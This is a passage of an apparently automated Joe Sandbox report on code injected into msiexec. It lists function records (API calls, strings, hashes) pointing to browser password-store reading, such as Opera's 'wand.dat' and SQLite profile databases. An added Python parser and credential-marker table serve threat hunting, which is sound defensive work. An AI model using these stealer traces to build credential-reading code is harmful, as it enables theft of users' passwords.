                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                    • String ID: *.*$dat$wand.dat
                                                                    • API String ID: 2618321458-1828844352
                                                                    • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                    • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
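The records above (one "APIs / Strings / Memory Dump Source / Similarity" block per function, each carrying an API ID, a String ID and Opcode/Instruction fuzzy hashes) are emitted by the Joe Sandbox IDA plugin for the code found at 0x400000 in the injected msiexec process. They become useful for hunting only once they are machine-readable: the function whose String ID is `*.*$dat$wand.dat` and the one carrying SQLite error strings are what point at browser profile and password-store reading. The following is an added example, not code from this report or from Joe Security: a Python parser for that record layout, fed two records transcribed from this page (indentation trimmed), with a small credential-store indicator check whose marker table is this example's own assumption.

```python
"""Parse Joe Sandbox IDA-plugin function records (the repeated 'APIs / Strings /
Memory Dump Source / Similarity' blocks on this page) into objects that can be
grepped, clustered by API ID, or diffed by Instruction Fuzzy Hash across samples.
Added example, not the report's or Joe Security's code. SAMPLE is two records
transcribed from this page; the indicator table is this example's own assumption."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• memcpy.MSVCRT(?,?,?), ref: 0042EC7A" or, for callee activity, "• Part of subcall
# function 00415A91: memset.MSVCRT ref: 00415AAB"; args is greedy so "%s (%s)" survives.
API_RE = re.compile(
    r"^[•*]\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
STR_RE = re.compile(r"^[•*]\s*(?P<text>.*), xrefs: [0-9A-F]{8}$")   # Strings section
KV_RE = re.compile(r"^[•*]\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")  # metadata lines

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                      # call-site address as printed in the report
    parent: Optional[str] = None  # set for "Part of subcall function" entries

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)   # API ID, String ID, hashes, ...

def parse_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per 'APIs' header; the report indents subcall entries."""
    records: List[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                records.append(FunctionRecord())
            section = line
        elif not records:
            continue                       # text before the first record
        elif section == "APIs":
            if m := API_RE.match(line):
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                records[-1].apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
        elif section == "Strings":
            if m := STR_RE.match(line):
                records[-1].strings.append(m["text"])
        elif m := KV_RE.match(line):
            records[-1].meta[m["key"]] = m["val"]
    return records

def direct_apis(rec: FunctionRecord) -> List[str]:
    return [c.name for c in rec.apis if c.parent is None]   # callee activity excluded

def string_ids(rec: FunctionRecord) -> List[str]:
    return [s for s in rec.meta.get("String ID", "").split("$") if s]   # '$'-separated field

# Assumed indicator table (this example's own, not the report's): strings that point
# at browser credential stores being read by the code injected into msiexec.
CREDENTIAL_MARKERS: Dict[str, str] = {
    "wand.dat": "Opera wand password store",
    "sqlite_": "embedded SQLite engine (browser profile databases)",
}

def credential_indicators(rec: FunctionRecord) -> List[str]:
    hits = []
    for s in dict.fromkeys(string_ids(rec) + rec.strings):   # de-duplicated, ordered
        for marker, why in CREDENTIAL_MARKERS.items():
            if marker in s:
                hits.append(f"{s}: {why}")
    return hits

SAMPLE = """\
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
Similarity
• API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
• String ID: *.*$dat$wand.dat
• Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
APIs
  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
• memcpy.MSVCRT(?,?,?), ref: 0042EC7A
Strings
• virtual tables may not be altered, xrefs: 0042EBD2
• sqlite_altertab_%s, xrefs: 0042EC4C
• Cannot add a column to a view, xrefs: 0042EBE8
Similarity
• String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
• Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
"""
```

`parse_records(open(path).read())` over a saved copy of the report yields one object per function; `direct_apis` separates what a function calls itself from the "Part of subcall function" entries that describe its callees, and the `Instruction Fuzzy Hash` values in `meta` are the field to compare when checking whether another dump carries the same stealer routines. The marker table is deliberately small and is an assumption of this example; extend it with strings observed in your own dumps rather than treating it as a signature.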
                                                                    APIs
                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                    • wcslen.MSVCRT ref: 00410C74
                                                                    • _wtoi.MSVCRT(?), ref: 00410C80
                                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                    • String ID:
                                                                    • API String ID: 1549203181-0
                                                                    • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                    • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00412057
                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                    • String ID:
                                                                    • API String ID: 3550944819-0
                                                                    • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                    • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                    APIs
                                                                    • free.MSVCRT ref: 0040F561
                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$free
                                                                    • String ID: g4@
                                                                    • API String ID: 2888793982-2133833424
                                                                    • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                    • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: @
                                                                    • API String ID: 3510742995-2766056989
                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                    • memset.MSVCRT ref: 0040AF18
                                                                    • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@memcpymemset
                                                                    • String ID:
                                                                    • API String ID: 1865533344-0
                                                                    • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                    • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004144E7
                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                    • memset.MSVCRT ref: 0041451A
                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1127616056-0
                                                                    • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                    • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                    • memset.MSVCRT ref: 0042FED3
                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID: sqlite_master
                                                                    • API String ID: 438689982-3163232059
                                                                    • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                    • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                    APIs
                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3917621476-0
                                                                    • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                    • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                    APIs
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                    • String ID:
                                                                    • API String ID: 822687973-0
                                                                    • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                    • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                    • malloc.MSVCRT ref: 00417459
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                    • free.MSVCRT ref: 0041747F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                    • String ID:
                                                                    • API String ID: 2605342592-0
                                                                    • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                    • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                    • RegisterClassW.USER32(?), ref: 00412428
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 2678498856-0
                                                                    • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                    • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Item
                                                                    • String ID:
                                                                    • API String ID: 3888421826-0
                                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00417B7B
                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                    • String ID:
                                                                    • API String ID: 3727323765-0
                                                                    • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                    • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F673
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2754987064-0
                                                                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2754987064-0
                                                                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00402FD7
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                    • strlen.MSVCRT ref: 00403006
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 2754987064-0
                                                                    • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                    • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$CloseHandle
                                                                    • String ID: General
                                                                    • API String ID: 3722638380-26480598
                                                                    • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                    • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                    APIs
                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                    • String ID:
                                                                    • API String ID: 764393265-0
                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                    APIs
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
